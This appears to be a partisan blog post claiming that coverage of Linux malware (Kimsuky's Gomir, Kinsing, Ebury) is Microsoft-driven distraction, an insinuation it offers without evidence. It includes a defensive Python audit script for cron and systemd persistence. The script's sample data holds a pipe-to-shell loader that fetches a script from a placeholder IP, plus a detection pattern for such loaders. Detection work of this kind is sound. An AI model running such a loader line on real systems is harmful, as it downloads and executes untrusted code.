Microsoft-Connected Sites Trying to Shift Attention Away From Microsoft's Megabreach Only Days Before Important If Not Unprecedented Grilling by the US Government?
The real news to focus on:
Context (days ago):
- Ebury is Not "Linux", That's Just the Media Shifting Attention (Microsoft in the Hot Seat for Total Breach Right Now)
- FUD Alert: 2024 is Not 2011 and Ebury is Not "Linux"
The latest "twist":
- Kimsuky hackers deploy new Linux backdoor in attacks on South Korea [Ed: New way to shift attention away from Smith's grilling for Microsoft getting cracked? See this. This is from a Microsoft-connected site.]
The North Korean hacker group Kimsuky has been using a new Linux malware called Gomir that is a version of the GoBear backdoor delivered via trojanized software installers.
Kimsuky is a state-sponsored threat actor linked to North Korea’s military intelligence, the Reconnaissance General Bureau (RGB).
- Breach Roundup: Kimsuky Serves Linux Trojan [Ed: Interesting timing because of Microsoft being under the microscope for mega-breach. It says "hackers used a Linus [sic] backdoor", so they clearly don't know what they write about, they just blindly relay FUD for sponsors.]
- Kimsuky APT Using Newly Discovered Gomir Linux Backdoor [Ed: Microsofters looking for excuses to say "Linux backdoor" a few days before Microsoft cover-up and complete, total breach becoming an anticipated federal grilling?]
Is the timing merely a coincidence yet again? We previously showed people on Microsoft's payroll and even Microsoft staff inside the Linux Foundation taking the lead in these campaigns of fearmongering (since end of March).
Why does the mainstream media not entertain the possibility a lot of these talking points are directed out of Redmond?
Update
This FUD only intensified a day later, e.g.
- Kimsuky APT Deploying Linux Backdoor Gomir in South Korean Cyber Attacks
The Kimsuky (aka Springtail) advanced persistent threat (APT) group, which is linked to North Korea's Reconnaissance General Bureau (RGB), has been observed deploying a Linux version of its GoBear backdoor as part of a campaign targeting South Korean organizations.
The backdoor, codenamed Gomir, is "structurally almost identical to GoBear, with extensive sharing of code between malware variants," the Symantec Threat Hunter Team, part of Broadcom, said in a new report. "Any functionality from GoBear that is operating system-dependent is either missing or reimplemented in Gomir."
- North Korean hackers have some devious new Linux backdoor attacks to target victims
Among the similarities between Gomir and GoBear are direct C2 communication, persistence methods, and different capabilities, such as pausing communications with C2, running arbitrary shell commands, changing the working directory, probing network endpoints, reporting system configuration details, starting a reverse proxy for remote connections, creating arbitrary files on the system, exfiltrating files from the system, and more.
- North Korea-Linked Kimsuky Hackers Use Gomir Backdoor on Linux | Tech Times
The North Korean cyber-espionage group Kimsuky, linked to the military intelligence agency Reconnaissance General Bureau (RGB), has unveiled a new Linux malware known as Gomir.
- Kinsing malware exploits Apache Tomcat on Linux clouds
Tenable's Cloud Security Research team has unearthed a series of attacks by the Kinsing malware family, particularly targeting Linux-based cloud infrastructures. In a new development, these malicious programmes are now exploiting Apache Tomcat servers, adopting new advanced stealth techniques for file system penetration and persistence.
Kinsing, a malware family operational for numerous years, primarily attacks Linux-based cloud infrastructure. Known for exploiting a range of vulnerabilities to gain unauthorised access, the hostile actors behind the Kinsing malware frequently install backdoors and illicitly deploy cryptocurrency miners on compromised systems. Once the infection has taken hold, Kinsing co-opts system resources, employing these for cryptomining. This redirection of system resources inhibits server performance and increases operational costs.
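Strip away the headlines and both stories above reduce to the same thing a Linux administrator can actually check: the Gomir write-up lists "persistence methods" among the backdoor's capabilities, and the Kinsing piece describes backdoors and cryptominers that have to survive a reboot to be worth anything. What runs on a schedule or at boot, and from where, is therefore the practical question. The Python below is an added example written for this page; it is not code from Symantec, Tenable, ESET or any of the cited articles and uses no indicators from their reports. The crontab lines and systemd unit texts are constructed samples, and the three heuristics (an executable launched from a world-writable directory, a download piped straight into a shell, and a unit named like a core daemon but started from a non-standard path) are generic patterns, not signatures for either malware family.

```python
"""Generic Linux persistence audit over constructed sample data.

Added example for this page, not code from any vendor report. The heuristics
are deliberately generic: they catch common backdoor/miner persistence habits,
not a specific family, so every hit still needs a human look.
"""
import re
from dataclasses import dataclass

# Directories any local user can normally write to. A scheduled job or daemon
# whose executable lives here is unusual on a well-run host.
WRITABLE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# "curl ... | sh" style loaders are a classic miner/backdoor bootstrap.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Unit names that imitate core system daemons; suspicious when the binary is
# not under one of the standard system bin/lib directories.
DAEMON_LOOKALIKES = ("syslogd", "sshd", "cron", "systemd", "kworker")
STANDARD_BIN_DIRS = ("/usr/sbin/", "/usr/bin/", "/sbin/", "/bin/", "/usr/lib/", "/lib/")


@dataclass(frozen=True)
class Finding:
    source: str   # "cron" or "systemd"
    name: str     # the crontab line or the unit file name
    reason: str


def _check_command(source, name, cmd):
    """Apply the path and pipe-to-shell heuristics to one command string."""
    findings = []
    tokens = cmd.split()
    # systemd allows prefixes such as '-', '@', '!' before the executable path.
    exe = tokens[0].lstrip("-@!+:") if tokens else ""
    if exe.startswith(WRITABLE_DIRS):
        findings.append(Finding(source, name, f"executable in writable dir: {exe}"))
    if PIPE_TO_SHELL.search(cmd):
        findings.append(Finding(source, name, "downloads and pipes to a shell"))
    return findings


def audit_crontab(lines):
    """Audit user-crontab lines (five schedule fields or an @keyword, then command)."""
    findings = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)          # e.g. "@reboot <command>"
            cmd = parts[1] if len(parts) > 1 else ""
        else:
            parts = line.split(None, 5)          # m h dom mon dow <command>
            if len(parts) < 6:
                continue
            cmd = parts[5]
        findings.extend(_check_command("cron", line, cmd))
    return findings


def audit_systemd(units):
    """Audit a mapping of unit file name -> unit file text."""
    findings = []
    for name, text in units.items():
        match = re.search(r"^ExecStart=(.+)$", text, re.MULTILINE)
        if not match:
            continue
        cmd = match.group(1).strip()
        findings.extend(_check_command("systemd", name, cmd))
        exe = cmd.split()[0].lstrip("-@!+:")
        base = name.removesuffix(".service")
        if base.startswith(DAEMON_LOOKALIKES) and not exe.startswith(STANDARD_BIN_DIRS):
            findings.append(Finding("systemd", name, f"daemon-like name runs {exe}"))
    return findings


# Constructed sample input (not real artefacts from any incident).
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/bin/certbot renew --quiet",          # benign
    "*/5 * * * * /dev/shm/.x/update.sh",                  # runs from /dev/shm
    "@reboot curl -fsSL http://198.51.100.7/i.sh | sh",   # pipe-to-shell loader
]
SAMPLE_UNITS = {
    "sshd.service": "[Unit]\nDescription=OpenSSH server\n[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "kworkerd.service": "[Unit]\nDescription=kernel worker\n[Service]\nExecStart=/var/tmp/.kworkerd\nRestart=always\n",
}


def run_audit():
    """Return every finding over the constructed samples (four expected)."""
    return audit_crontab(SAMPLE_CRONTAB) + audit_systemd(SAMPLE_UNITS)


if __name__ == "__main__":
    for f in run_audit():
        print(f"[{f.source}] {f.name}: {f.reason}")
```

On a real host the same functions can be fed the output of `crontab -l` for each user and the text of each unit under /etc/systemd/system; the point is that persistence has to land somewhere enumerable, whichever name the vendor gives the malware.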
Also the older wave:
- 400K Linux Servers Recruited by Resurrected Ebury Botnet
A Linux-based botnet is alive and well, powering cryptocurrency theft and financial scams years after the imprisonment of one of the key perpetrators behind it.
The Ebury botnet – which was first discovered 15 years ago – has backdoored nearly 400,000 Linux, FreeBSD, and OpenBSD servers. More than 100,000 servers were still compromised as of late 2023, according to new research from cybersecurity vendor ESET.
Victims include universities, small and large enterprises, Internet service providers, cryptocurrency traders, Tor exit nodes, and many hosting providers worldwide.
- ESET Research: Ebury botnet alive & growing; 400k Linux servers compromised for cryptocurrency theft and financial gain
ESET Research released today its deep-dive investigation into one of the most advanced server-side malware campaigns, which is still growing and has seen hundreds of thousands of compromised servers in its at least 15-year-long operation. Among the activities of the infamous Ebury group and botnet over the years has been the spread of spam, web traffic redirections, and credential stealing. In recent years it has diversified to credit card and cryptocurrency theft. Additionally, Ebury has been deployed as a backdoor to compromise almost 400,000 Linux, FreeBSD, and OpenBSD servers; more than 100,000 were still compromised as of late 2023. In many cases, Ebury operators were able to gain full access to large servers of ISPs and well-known hosting providers.
Sam Varghese joins in:
- Tenable finds old GNU/Linux malware now targeting Tomcat servers
Security firm Tenable says its Cloud Security Research Team recently discovered that the Kinsing malware, which is known to target Linux-based cloud infrastructure, is exploiting Apache Tomcat servers using what it claims are "new advanced stealth techniques".
2 more FUD pieces today?
- New Linux Backdoor Attacking Linux Users Via Installation Packages [Ed: Distraction with "Linux backdoor" just in time for Microsoft grilling over getting cracked completely, then covering up?]
Linux is widely used in numerous servers, cloud infrastructure, and Internet of Things devices, which makes it an attractive target for gaining unauthorized access or spreading malware.
- North Korea-linked Kimsuky used a new Linux backdoor in recent attacks [Ed: They keep pushing this false narrative of "back doors" to FUD Linux while Microsoft should be blasted]
Another update: we're still seeing it this week, e.g.
- Novel Linux backdoor used in Kimsuky attacks
Security Affairs reports that North Korean state-sponsored cyberespionage operation Kimsuky, also known as APT43, Springtail, Black Banshee, Velvet Chollima, Thallium, and ARCHIPELAGO, has been targeting South Korean entities with the new Gomir Linux backdoor.